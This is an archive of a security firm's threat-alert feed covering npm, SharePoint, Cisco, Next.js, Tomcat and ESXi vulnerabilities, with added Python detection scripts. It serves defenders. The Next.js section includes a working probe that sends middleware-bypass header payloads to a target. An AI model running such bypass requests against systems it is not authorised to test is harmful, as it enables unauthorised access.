Threat Alert Archives | CyberMaxx
https://www.cybermaxx.com/resources/type/threat-alert/
Feed last updated: Mon, 08 Sep 2025 20:50:34 +0000

Largest NPM Supply Chain Attack Disrupts Billions of Downloads
https://www.cybermaxx.com/resources/largest-npm-supply-chain-attack-disrupts-billions-of-downloads/
Mon, 08 Sep 2025 20:48:39 +0000

The post Largest NPM Supply Chain Attack Disrupts Billions of Downloads appeared first on CyberMaxx.

NPM, the backbone of the modern JavaScript ecosystem, has suffered its most significant supply chain compromise to date. The scale is enormous, with more than 2.6 billion weekly downloads affected.

The breach began with the compromise of package maintainer Josh Junon’s accounts through a phishing email dressed up as a 2FA reset notice. Once inside, the attackers published malicious updates to widely used npm libraries. Junon confirmed the compromise publicly, sharing both the phishing email and screenshots of the takeover.

The attack was multi-layered. In addition to injecting malicious code into packages, the attackers set up a credential-harvesting site: the phishing domain hosted a clone of the official npm site, designed to capture developer credentials directly.

The scope of impacted packages is unprecedented. Some of the most widely downloaded NPM modules were compromised, including:

• chalk (299.99m weekly downloads)
• debug (357.6m)
• ansi-styles (371.41m)
• supports-color (287.1m)
• strip-ansi (261.17m)
• color-convert (193.5m)
• ansi-regex (243.64m)
• color-name (191.71m)
• is-arrayish (73.8m)
• slice-ansi (59.8m)
• error-ex (47.17m)
• color-string (27.48m)
• simple-swizzle (26.26m)
• chalk-template (3.9m)
• backslash (0.26m)

These libraries sit at the base of countless dependency chains. The infection, therefore, cascades across millions of projects, even if developers never imported the compromised packages directly.

The fallout is immediate. Continuous integration pipelines around the world are now failing npm audits. Organizations are scrambling to identify if their builds pulled in the malicious versions. Given the ubiquity of packages like chalk and debug, it is likely that the compromise has reached into production environments at scale.

This incident highlights a persistent fragility in the open-source supply chain. Centralized ecosystems like NPM magnify both the benefits of reusable code and the risks of compromise. Developers have little visibility into transitive dependencies and often little recourse when upstream maintainers are targeted.

For now, security teams should audit their dependency trees and lockfiles for the packages above (including transitive copies), pin known-good versions, and monitor npm advisories closely. The situation is evolving, and further disclosures are likely as investigators untangle the breadth of the attack.
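As an added example (not code from the CyberMaxx post or from npm), the Python below walks a package-lock.json, reports every copy of the packages listed above including transitive copies nested under other packages, and filters them against a set of known-bad versions that you supply from the advisory. This page does not list the malicious version numbers, so the script does not either; the bad-version map is an input you fill in once the advisory confirms them. The sample lockfiles are constructed for the demonstration. `npm ls <package> --all` gives the same view one package at a time; this is for CI, where one pass over the lockfile is wanted.

```python
import json
import sys

# Package names taken from the list in the post. The backdoored version
# numbers are NOT given on the page; pass them to flag_malicious() as
# {name: {version, ...}} from the npm advisory once confirmed.
WATCHLIST = {
    "chalk", "debug", "ansi-styles", "supports-color", "strip-ansi",
    "color-convert", "ansi-regex", "color-name", "is-arrayish", "slice-ansi",
    "error-ex", "color-string", "simple-swizzle", "chalk-template", "backslash",
}


def package_name_from_key(key):
    """Map a lockfile v2/v3 "packages" key such as
    "node_modules/jest/node_modules/chalk" to the bare package name "chalk"."""
    idx = key.rfind("node_modules/")
    return key if idx == -1 else key[idx + len("node_modules/"):]


def find_watched(lock, watchlist=WATCHLIST):
    """Return every install of a watched package, including transitive copies
    nested under other packages. Handles lockfileVersion 1 (nested
    "dependencies" tree) and 2/3 (flat "packages" map keyed by install path)."""
    hits = []
    packages = lock.get("packages")
    if packages is not None:
        for key, meta in packages.items():
            if key == "":  # root project entry, not a dependency
                continue
            name = package_name_from_key(key)
            if name in watchlist:
                hits.append({"name": name, "version": meta.get("version"), "path": key})
    else:
        def walk(deps, prefix):
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                if name in watchlist:
                    hits.append({"name": name, "version": meta.get("version"), "path": path})
                walk(meta.get("dependencies", {}), path + "/")
        walk(lock.get("dependencies", {}), "")
    return hits


def flag_malicious(hits, bad_versions):
    """Keep only hits whose resolved version is in the advisory's bad set."""
    return [h for h in hits if h["version"] in bad_versions.get(h["name"], set())]


# Constructed sample lockfiles (v3 and v1 layouts) for demonstration only.
SAMPLE_LOCK_V3 = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/chalk": {"version": "5.3.0"},
        "node_modules/debug": {"version": "4.3.4"},
        "node_modules/left-pad": {"version": "1.3.0"},
        "node_modules/jest/node_modules/chalk": {"version": "4.1.2"},
    },
}
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "jest": {"version": "29.0.0", "dependencies": {"chalk": {"version": "4.1.2"}}},
        "debug": {"version": "4.3.4"},
    },
}


if __name__ == "__main__":
    # Usage: python lockscan.py package-lock.json   (falls back to the sample)
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK_V3
    for hit in find_watched(lock):
        print(f"{hit['name']}@{hit['version']}  ({hit['path']})")
```

Every reported copy should be compared against the advisory; a clean top-level `chalk` says nothing about the second copy nested under a test runner, which is exactly where the v3 sample above hides one.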

Further reading and ongoing coverage:
https://news.ycombinator.com/item?id=45169794
https://github.com/github/advisory-database/issues/6099

CVE-2025-53770: SharePoint “ToolShell” Zero-Day Exploit – What You Need to Know
https://www.cybermaxx.com/resources/cve-2025-53770-sharepoint-toolshell-zero-day-exploit-what-you-need-to-know/
Mon, 21 Jul 2025 14:00:37 +0000

On July 19, 2025, Microsoft confirmed active exploitation of a critical vulnerability in SharePoint Server, now tracked as CVE-2025-53770. This zero-day flaw, dubbed “ToolShell” by researchers, allows attackers to execute arbitrary code remotely without authentication and to maintain long-term persistence by stealing cryptographic keys.

SharePoint is a widely used collaboration platform, and this vulnerability targets core components in the SharePoint web interface. As of July 21, emergency patches have been released for SharePoint Subscription Edition, SharePoint Server 2019, and SharePoint Server 2016. If your environment includes on-prem SharePoint servers, you should treat this vulnerability as a priority.

What Is CVE-2025-53770?

CVE-2025-53770 is a remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server, classified by Microsoft as deserialization of untrusted data. An attacker sends specially crafted HTTP POST requests to endpoints such as ToolPane.aspx, which is normally used to manage web part settings. Because SharePoint deserializes the attacker-controlled ViewState data carried in that request, the attacker can execute arbitrary code on the server.

This exploit does not require prior authentication. A successful attack gives the adversary the ability to upload files, run PowerShell commands, steal cryptographic secrets, or establish persistent access to the server.

In many observed cases, the attackers drop a malicious web shell called spinstall0.aspx inside SharePoint’s \LAYOUTS\ directory. This shell is then used to steal the server’s machine keys – the cryptographic values that secure cookies, authentication tokens, and ViewState.

What Can an Attacker Do?

Once CVE-2025-53770 is exploited successfully, an attacker can:

  • Upload a web shell to the SharePoint server
  • Steal ASP.NET machine keys used for signing and decrypting ViewState and authentication tokens
  • Execute arbitrary code as the SharePoint worker process (w3wp.exe)
  • Bypass authentication mechanisms using forged ViewState data
  • Persist access even after the web shell is removed, by reusing stolen machine keys
  • Move laterally to other systems in the environment

Because this vulnerability can be exploited without user interaction, it is particularly dangerous in environments with internet-facing SharePoint servers.

Mitigations

1. Apply the Official Microsoft Patch

Microsoft has released out-of-band patches for the following editions:

  • SharePoint Subscription Edition – KB5002768
  • SharePoint Server 2019 – KB5002754
  • SharePoint Server 2016 – KB5002745

You should install the patch immediately, even if you have already applied earlier July updates. The new patch contains stronger protections and also includes previous fixes like CVE-2025-49704 and CVE-2025-49706.

2. Rotate ASP.NET Machine Keys

After applying the patch, rotate the ASP.NET machine keys of every SharePoint web application. Microsoft provides two supported routes: the Update-SPMachineKey PowerShell cmdlet, or the Machine Key Rotation timer job in Central Administration. The keys themselves live in each web application’s web.config, typically located under:

C:\inetpub\wwwroot\wss\VirtualDirectories\[port]\web.config

If you rotate manually instead, generate new validationKey and decryptionKey values, apply the same values on every server in the farm, and then restart IIS:

iisreset

This step ensures that keys already stolen can no longer be used to forge authentication tokens or ViewState payloads. The order matters: keys rotated on an unpatched server can simply be stolen again, so patch first and rotate second.

3. Enable AMSI and Defender Antivirus

Microsoft recommends enabling Antimalware Scan Interface (AMSI) integration for SharePoint and running Microsoft Defender Antivirus in active mode. These tools help detect and block ViewState payloads and other malicious scripts.

Indicators and Threat Hunting

If you suspect compromise or want to validate that no exploitation occurred, look for the following indicators of compromise (IOCs).

Network Requests

Look for POST requests to:

  • /_layouts/15/ToolPane.aspx?DisplayMode=Edit

Known IPs

  • 107.191.58[.]76
  • 104.238.159[.]149
  • 96.9.125[.]147

File Artifacts

  • Presence of spinstall0.aspx under:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\

  • Any newly created .aspx files in the \LAYOUTS\ directory

IIS Log Patterns

  • POST requests to /sites/*/_layouts/15/ToolPane.aspx
  • Suspicious Referer headers like /sites/*/_layouts/SignOut.aspx
  • GET requests to spinstall0.aspx with long Base64 parameters

Process Tree Anomalies

  • w3wp.exe spawning powershell.exe, cmd.exe, or unusual child processes
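As an added example (not code from the CyberMaxx post or from Microsoft), the Python below runs the IIS log indicators above over W3C-format IIS log lines: POSTs to ToolPane.aspx with DisplayMode=Edit, a SignOut.aspx Referer, any request for spinstall0.aspx, and the three known IPs. The log lines are constructed for the demonstration (placeholder host, usernames and internal client); the paths and IPs are the ones listed above. For a real hunt, feed it the u_ex*.log files from the default IIS log location, C:\inetpub\logs\LogFiles\W3SVC*\.

```python
# Known attacker IPs listed in the post (defanged there; plain here for matching).
KNOWN_IPS = {"107.191.58.76", "104.238.159.149", "96.9.125.147"}


def parse_iis_log(text):
    """Yield one dict per request from a W3C-format IIS log, using the
    #Fields: header to name the columns. Malformed rows are skipped."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):  # other directives (#Software, #Date, ...)
            continue
        if fields is None:
            raise ValueError("data row before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def hunt_toolshell(entries):
    """Apply the IOC patterns from the post to parsed log entries and return
    one record per matching request with the reasons it matched."""
    hits = []
    for e in entries:
        method = e.get("cs-method", "")
        stem = e.get("cs-uri-stem", "").lower()
        query = e.get("cs-uri-query", "").lower()
        referer = e.get("cs(Referer)", "").lower()
        client = e.get("c-ip", "")
        reasons = []
        if method == "POST" and stem.endswith("/_layouts/15/toolpane.aspx") and "displaymode=edit" in query:
            reasons.append("POST to ToolPane.aspx with DisplayMode=Edit")
        if referer.endswith("/_layouts/signout.aspx"):
            reasons.append("Referer set to SignOut.aspx")
        if stem.endswith("/spinstall0.aspx"):
            reasons.append("request for spinstall0.aspx web shell")
        if client in KNOWN_IPS:
            reasons.append(f"known attacker IP {client}")
        if reasons:
            hits.append({
                "when": f"{e.get('date')} {e.get('time')}",
                "client": client,
                "request": f"{method} {e.get('cs-uri-stem')}",
                "reasons": reasons,
            })
    return hits


# Constructed sample log (not a real capture). Host, users and the internal
# client are placeholders; the external IP and paths are from the post's IOCs.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 03:12:44 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 107.191.58.76 Mozilla/5.0 https://sp.example.com/_layouts/SignOut.aspx 200
2025-07-19 03:12:51 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 107.191.58.76 Mozilla/5.0 - 200
2025-07-19 03:13:02 10.0.0.5 GET /sites/hr/_layouts/15/start.aspx - 443 alice 10.0.1.22 Mozilla/5.0 - 200
"""

if __name__ == "__main__":
    for hit in hunt_toolshell(parse_iis_log(SAMPLE_LOG)):
        print(hit["when"], hit["client"], hit["request"], "; ".join(hit["reasons"]))
```

The ToolPane check keys on the path suffix, so the site-collection-relative form (/sites/*/_layouts/15/ToolPane.aspx) listed above matches as well. A request that matches only on a known IP is weaker evidence than a ToolPane POST with a SignOut Referer; the reasons list is there so the triage can weigh them.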

Conclusion

CVE-2025-53770 is a serious and actively exploited vulnerability that affects all modern on-prem SharePoint deployments. Even if your servers are not publicly accessible, an attacker with internal access could exploit this flaw to gain full control.

Apply the latest patches from Microsoft, rotate your machine keys, and carefully review your logs for signs of compromise. If you detect any suspicious activity, consider isolating affected systems and initiating a full incident response. Consult your security provider for further information on incident response.

The CyberMaxx team are continuing to monitor for changes and will provide further information as it becomes available.

Further Reading

https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/

Critical Cisco Flaw: CVE-2025-20309 Grants Remote Root Access
https://www.cybermaxx.com/resources/critical-cisco-flaw-cve-2025-20309-grants-remote-root-access/
Thu, 03 Jul 2025 14:51:01 +0000

Cisco has patched a critical vulnerability (CVSS 10.0) in its Unified Communications Manager (Unified CM) and Session Management Edition (SME) products. Tracked as CVE-2025-20309, the flaw stems from a hardcoded root account with static credentials reserved for development—credentials that cannot be changed or removed.

This vulnerability affects Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1, making them susceptible to SSH logins as root with the static credentials. In a worst-case scenario, an attacker could exploit this to gain full root privileges and execute arbitrary commands remotely.

The issue was uncovered during Cisco’s internal security testing, and so far, there’s no evidence of in-the-wild exploitation. However, the potential impact is high: with root access, threat actors could pivot across networks, intercept calls, alter configurations, or disrupt communications.

Indicators of Compromise

The indicator of compromise (IoC) Cisco names is a log entry in /var/log/active/syslog/secure showing a successful sshd login by the root user.

Mitigation

Cisco recommends upgrading vulnerable ES versions to Service Update 3 (15SU3) or applying the patch file ciscocm.CSCwp27755_D0247-1.cop.sha512 via their TAC channel. There are no known workarounds, and non-ES releases (e.g., 12.5, 14.x) are unaffected.
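As an added example (not code from the CyberMaxx post or from Cisco), the Python below does the two things an operator can script for this advisory: decide whether a Unified CM version string falls inside the affected ES range quoted above, and search secure-log lines for a successful root SSH login, the indicator the advisory names. The log lines are constructed in standard OpenSSH syslog format; the wording on an appliance may differ, so adjust the pattern to a real sample from /var/log/active/syslog/secure before relying on it.

```python
import re

# Affected Engineering Special range from the post, inclusive.
AFFECTED_LOW = (15, 0, 1, 13010, 1)
AFFECTED_HIGH = (15, 0, 1, 13017, 1)


def parse_cucm_version(text):
    """Turn a Unified CM version string like "15.0.1.13010-1" into a tuple
    that sorts numerically field by field."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)\.(\d+)-(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Unified CM version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True when the version lies inside the ES range the advisory names.
    Anything outside it, including the non-ES 12.5 and 14.x trains, is False."""
    return AFFECTED_LOW <= parse_cucm_version(version) <= AFFECTED_HIGH


# Successful sshd logins for root, in standard OpenSSH syslog wording
# (assumption: adjust to a real sample from the appliance).
ROOT_LOGIN = re.compile(r"sshd\[\d+\]: Accepted (\S+) for root from (\S+) port (\d+)")


def find_root_ssh_logins(lines):
    """Return one record per successful root SSH login found in the lines.
    Failed attempts and other users are ignored."""
    hits = []
    for line in lines:
        m = ROOT_LOGIN.search(line)
        if m:
            hits.append({"auth": m.group(1), "source": m.group(2), "port": int(m.group(3))})
    return hits


# Constructed sample log lines (not a real capture).
SAMPLE_SECURE_LOG = [
    "Jul  2 10:14:03 cucm-pub sshd[21544]: Accepted publickey for root from 203.0.113.10 port 51822 ssh2",
    "Jul  2 10:20:17 cucm-pub sshd[21610]: Accepted password for admin from 10.1.1.5 port 51890 ssh2",
    "Jul  2 10:21:40 cucm-pub sshd[21622]: Failed password for root from 203.0.113.10 port 51901 ssh2",
]

if __name__ == "__main__":
    for v in ("15.0.1.13010-1", "15.0.1.13017-1", "15.0.1.13018-1", "14.0.1.13010-1"):
        print(v, "affected" if is_affected(v) else "not in affected range")
    for hit in find_root_ssh_logins(SAMPLE_SECURE_LOG):
        print("root login via", hit["auth"], "from", hit["source"], "port", hit["port"])
```

A version outside the range only means the static-credential build is not in use; a root login found in the log still needs investigating regardless of version, since the account may have been used before the upgrade.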

Cisco Unified Communications Manager Static SSH Credentials Vulnerability

Security Advisory: SentinelOne EDR Bypass Vulnerability
https://www.cybermaxx.com/resources/security-advisory-sentinelone-edr-bypass-vulnerability/
Tue, 06 May 2025 18:24:09 +0000

CyberMaxx is aware of the recent blog post by Aon’s Stroz Friedberg highlighting a method used by threat actors to bypass SentinelOne’s anti-tamper protections via the agent upgrade/downgrade mechanism.

This technique requires access to a beachhead host, escalation to administrative access, and a copy of a newer legitimate SentinelOne installation MSI file. Taken together, these factors significantly limit the threat surface of this attack. SentinelOne actively collaborated with Stroz Friedberg to assess the issue and provide mitigation guidance.

CyberMaxx is also conducting a review of its SentinelOne tenant to ensure it aligns with best practices and implement appropriate mitigations to further protect our customers. Our threat intelligence team has utilized the IOCs from the blog post to create detections against suspected attacks. We will continue to monitor for more information and provide that as necessary and available.

Recommendations

  • Keep an up-to-date asset inventory.
  • Follow regularly scheduled maintenance cycles.
  • Disable local admin/install rights for regular users.
  • Ensure artifacts from the EDR installation are removed from hosts after installation.

More Reading / Information

Conti Ransomware Gang Rank EDR Solutions Based on Ease of Evasion
https://www.cybermaxx.com/resources/conti-ransomware-gang-rank-edr-solutions-based-on-ease-of-evasion/
Wed, 30 Apr 2025 20:22:08 +0000

The Conti ransomware gang recently published an “EDR Tier List” on their Twitter (now X) page, ranking popular Endpoint Detection and Response (EDR) solutions by how effective they have proved against the group and how hard they are to bypass during attacks.

Shared by @PsExec64, the list uses a tiered system from S Tier to LOL.

Tier breakdown below:

  • S Tier: The toughest EDRs to bypass, representing some level of resistance.
  • A Tier: Strong performers that require effort to defeat.
  • B Tier: Middling; attackers take them seriously, but workarounds exist.
  • C Tier: Weak enough to be dismissed in most serious attacks.
  • D Tier: Almost irrelevant, relatively trivial obstacles.
  • LOL Tier: Reserved for tools considered laughably ineffective in real-world breaches.

One surprise was the placement of Microsoft Defender for Endpoint (MDE) in the LOL Tier, sparking discussion among security professionals. While MDE has solid detection capabilities when properly configured, it’s likely that Conti’s low rating reflects how frequently they encounter it in default or poorly secured deployments. Many organizations rely on MDE out of the box without enabling its advanced protections, making it far easier for threat actors to evade — and justifying the “LOL” label in Conti’s eyes.

Later, the group mentioned that they can bypass all EDRs listed – mentioning that some require more work than others.

The post created a lot of discussion in the comments, with various users pointing out benefits and flaws in various platforms.

The key takeaway here is that configuration matters just as much as product choice. Strong tools can become weak if left in their default state and not used to their full potential.

CVE-2025-29927: Critical Vulnerability Leading to Authentication Bypass in Next.js
https://www.cybermaxx.com/resources/cve-2025-29927-critical-vulnerability-leading-to-authentication-bypass-in-next-js/
Tue, 25 Mar 2025 13:53:11 +0000

A critical security vulnerability, identified as CVE-2025-29927, has been discovered in Next.js. This flaw enables attackers to bypass authorization checks implemented in middleware, potentially granting unauthorized access to sensitive areas of applications, such as administrative pages.

What Is The Vulnerability?

Next.js utilizes an internal header, x-middleware-subrequest, to prevent recursive requests that could lead to infinite loops. However, in affected versions, it is possible to manipulate this header to skip middleware execution. This means that critical checks, including authorization validation, can be circumvented, allowing unauthorized requests to reach protected routes.

Affected Versions

  • 15.x prior to 15.2.3
  • 14.x prior to 14.2.25
  • 13.x prior to 13.5.9

Applications hosted on platforms like Vercel and Netlify, or those deployed as static exports, are not affected by this issue.

Impact

Exploiting this vulnerability allows an attacker to bypass authentication and authorization checks when they are enforced in middleware, for example a middleware function that inspects a session cookie and redirects unauthenticated users to a login page. Checks performed inside the route handler or API route itself still run, so applications that rely on middleware alone to gate protected routes are the ones exposed.

Mitigation

Upgrade Next.js: Update to the latest patched versions—15.2.3, 14.2.25, or 13.5.9—as applicable to your application.​

Implement Workarounds: If immediate upgrading is not feasible, configure your web server or reverse proxy to block or strip the x-middleware-subrequest header from external requests.

Original blogpost by Rachid Allam who discovered this vulnerability: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

Testing

The CyberMaxx Security Research team have provided a script to test if your application is potentially vulnerable to CVE-2025-29927. Find it here: GitHub – TheresAFewConors/CVE-2025-29927-Testing
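As an added example (not the CyberMaxx Security Research team’s script, and not code from the Next.js project), the Python probe below sends one request to a protected route without the header and one per candidate header value, and reports a bypass when a redirect, 401 or 403 turns into a 200. The candidate values follow the researcher’s write-up linked above (a single middleware path name for older releases, the name repeated five times for 15.x, where the recursion limit is five); confirm them against that post before relying on the result, and treat the src/ variants as an assumption covering projects with a src directory. The target URL is an argument you supply; run it only against applications you are authorised to test. For the workaround above, a reverse proxy that strips the header (in nginx, `proxy_set_header x-middleware-subrequest "";` in the relevant location block) should make every candidate return the baseline status.

```python
import urllib.error
import urllib.request

HEADER = "x-middleware-subrequest"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 3xx as the response instead of following it, so a redirect
    to the login page is visible as the baseline status."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def bypass_values(depth=5):
    """Header values to try. Bare names match the middleware file paths used by
    older releases; the colon-joined form repeats the name `depth` times to
    satisfy the recursion-depth check in recent releases."""
    names = ["middleware", "src/middleware", "pages/_middleware", "src/pages/_middleware"]
    values = []
    for name in names:
        values.append(name)
        values.append(":".join([name] * depth))
    return values


def fetch_status(url, headers=None, timeout=10):
    """GET the URL without following redirects and return the HTTP status."""
    req = urllib.request.Request(url, headers=headers or {}, method="GET")
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 3xx/4xx/5xx arrive here with _NoRedirect in place


def looks_bypassed(baseline, with_header):
    """The route counts as middleware-protected when the plain request is
    turned away (redirect to login, 401 or 403); it counts as bypassed when
    adding the header yields 200 instead."""
    return baseline in {301, 302, 303, 307, 308, 401, 403} and with_header == 200


def probe(url):
    """Return (baseline_status, {header_value: status}, [values that bypassed])."""
    baseline = fetch_status(url)
    results = {value: fetch_status(url, {HEADER: value}) for value in bypass_values()}
    bypassed = [v for v, s in results.items() if looks_bypassed(baseline, s)]
    return baseline, results, bypassed


if __name__ == "__main__":
    import sys
    # Usage: python nextjs_probe.py https://app.example.com/admin
    base, results, bypassed = probe(sys.argv[1])
    print("baseline status:", base)
    for value, status in results.items():
        print(f"{status}  {value}")
    print("VULNERABLE via" if bypassed else "no bypass observed", bypassed)
```

A baseline of 200 means the route is not gated by middleware at all (or the probing client is already authenticated), and the probe reports nothing; pick a route that redirects anonymous users to login.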

Potential Terror Threat Targeted at Health Sector – AHA & Health-ISAC Joint Threat Bulletin
https://www.cybermaxx.com/resources/potential-terror-threat-targeted-at-health-sector-aha-health-isac-joint-threat-bulletin/
Fri, 21 Mar 2025 17:00:21 +0000

CyberMaxx is aware of the security bulletin released jointly by the American Hospital Association (AHA) and Health-ISAC regarding a social media post on March 18, 2025, that mentioned active planning for a coordinated, multi-city terrorist attack on hospitals in the coming weeks.

We assess with a high degree of confidence that this threat concerns the physical domain and is not related to cyber infrastructure; we are nonetheless taking precautions. We have placed clients in the healthcare sector under additional scrutiny and are proactively threat-hunting for techniques that are primarily deployed in persistence-focused operations. We are reviewing logs from firewalls, VPNs, remote access services, and Active Directory environments for anomalies that indicate unauthorized access or exploitation.

Likewise, we strongly urge clients to make sure their operating systems and environments are patched and not vulnerable to known and common Active Directory attack paths such as PrintNightmare (CVE-2021-34527), Zerologon (CVE-2020-1472), and the sAMAccountName spoofing chain known as noPac (CVE-2021-42278 & CVE-2021-42287), which allow an attacker with a foothold on a perimeter device to escalate privileges and maintain persistent access to the Active Directory environment.

Recommendations

Review & Strengthen Physical Security Measures:

  • Assess physical security, cybersecurity, and emergency management plans.
  • Ensure visible security presence to deter potential threats.
  • Focus on facilities in mid-tier cities with lower security, as they are mentioned as primary targets.

More Information

https://health-isac.org/potential-terror-threat-targeted-at-health-sector-aha-health-isac-joint-threat-bulletin/

ApacheTomCat: CVE-2025-24813
https://www.cybermaxx.com/resources/apachetomcat-cve-2025-24813/
Tue, 18 Mar 2025 19:05:12 +0000

A new remote code execution (RCE) vulnerability in Apache Tomcat, tracked as CVE-2025-24813, is being exploited in the wild. A proof of concept (PoC) has already been released and, given the volume of activity and Tomcat’s pervasive use, attackers will likely attempt mass exploitation.

Exploitation can occur through a malformed PUT request to the API when the following conditions are met:

  • Writes enabled for the default servlet (readonly=”false”) – (disabled by default).
  • Support for partial PUT (enabled by default).
  • A target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads.
  • Attacker knowledge of the names of security sensitive files being uploaded.
  • The security sensitive files are also being uploaded via partial PUT.

Multiple sources have confirmed that this vulnerability is being actively exploited in the wild, utilizing a POC that was posted 2025-03-17.

Patched versions are available, and affected Apache Tomcat servers should be updated immediately. Because this vulnerability is being actively exploited, the CyberMaxx team recommends a full compromise assessment.
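As an added example (not code from the CyberMaxx post or from the Apache project), the Python below checks the two preconditions an operator can verify from configuration alone: whether a Tomcat version predates the first fixed release of its branch (9.0.99, 10.1.35 and 11.0.3, taken from the Apache Tomcat security advisory rather than from this page), and whether the DefaultServlet has readonly=false in web.xml, the non-default setting from the list above that makes the PUT path writable. The web.xml fragment is constructed for the demonstration. The remaining conditions in the list depend on how the application uses uploads and cannot be read from configuration.

```python
import re
import xml.etree.ElementTree as ET

# First fixed release per supported branch, per the Apache Tomcat security
# advisory (assumption: not listed on the page). 8.5 had no fix.
FIXED = {9: (9, 0, 99), 10: (10, 1, 35), 11: (11, 0, 3)}

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"


def parse_tomcat_version(text):
    """Parse "9.0.98", "10.1.35" or a milestone like "11.0.0-M1" / "9.0.0.M1".
    A milestone sorts below the final release carrying the same number."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[-.]M(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {text!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch), 0 if milestone else 1, int(milestone or 0))


def is_patched(version):
    """True if the version is at or past the first fixed release of its branch,
    False if it predates it, None for a branch with no fix at all."""
    v = parse_tomcat_version(version)
    fixed = FIXED.get(v[0])
    if fixed is None:
        return None
    return v >= fixed + (1, 0)


def _local(tag):
    """Strip the XML namespace so <servlet> matches with or without xmlns."""
    return tag.split("}")[-1]


def default_servlet_params(web_xml_text):
    """Collect the DefaultServlet init-params from a conf/web.xml or an
    application web.xml that overrides the default servlet."""
    params = {}
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = ""
        for child in servlet:
            if _local(child.tag) == "servlet-class" and child.text:
                cls = child.text.strip()
        if cls != DEFAULT_SERVLET:
            continue
        for init in servlet:
            if _local(init.tag) != "init-param":
                continue
            name = value = ""
            for child in init:
                if _local(child.tag) == "param-name":
                    name = (child.text or "").strip()
                elif _local(child.tag) == "param-value":
                    value = (child.text or "").strip()
            if name:
                params[name] = value
    return params


def writes_enabled(params):
    """The DefaultServlet is read-only unless readonly is explicitly false."""
    return params.get("readonly", "true").lower() == "false"


# Constructed web.xml fragment showing the dangerous, non-default setting.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>
"""

if __name__ == "__main__":
    for v in ("9.0.98", "9.0.99", "11.0.0-M1", "10.1.35", "8.5.100"):
        print(v, is_patched(v))
    print("DefaultServlet writable:", writes_enabled(default_servlet_params(SAMPLE_WEB_XML)))
```

Check both files: conf/web.xml sets the server-wide default, and an application’s own WEB-INF/web.xml can redeclare the default servlet with readonly=false even when the server-wide copy is untouched.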

CyberMaxx is monitoring the situation and will provide updates and remediation guidelines as they become available over the coming days.

References:

3 Vulnerabilities Identified in VMWare’s ESXi, allowing for VM Escape
https://www.cybermaxx.com/resources/3-vulnerabilities-identified-in-vmwares-esxi-allowing-for-vm-escape/
Wed, 05 Mar 2025 13:51:45 +0000

Three vulnerabilities have been identified that impact VMware ESXi products. Chained together, they allow an attacker with administrative privileges inside a guest VM to escape into the host OS. The CVE IDs are listed below:

  • CVE-2025-22224: Located in the VMCI interface, which can allow for out-of-bounds memory write leading to a heap overflow. Rated 9.3
  • CVE-2025-22225: Arbitrary write vulnerability that enables an attacker (with sufficient write privileges) to write into kernel memory. (Privilege Escalation to Sandbox Escape vulnerability). Rated 8.2
  • CVE-2025-22226: Out-of-bounds memory read in the HGFS component leading to information leakage. Attackers with admin permissions in a VM can exploit this to leak memory from the VMX process. Rated 7.1

VMware has confirmed that these vulnerabilities are being actively exploited in the wild.

Patches are available, and affected products should be updated immediately. Because of the active exploitation, the CyberMaxx team recommends performing a full compromise assessment. No exploits are publicly available, and indicators of compromise have not yet been released.

CyberMaxx is monitoring the situation and will provide updates and remediation guidelines as they become available over the coming days.

Official Advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390

LDAPNightmare Detection & Mitigation: CVE-2024-49113 & CVE-2024-49112
https://www.cybermaxx.com/resources/ldapnightmare-detection-mitigation-cve-2024-49113-cve-2024-49112/
Wed, 08 Jan 2025 15:45:18 +0000

Vulnerability

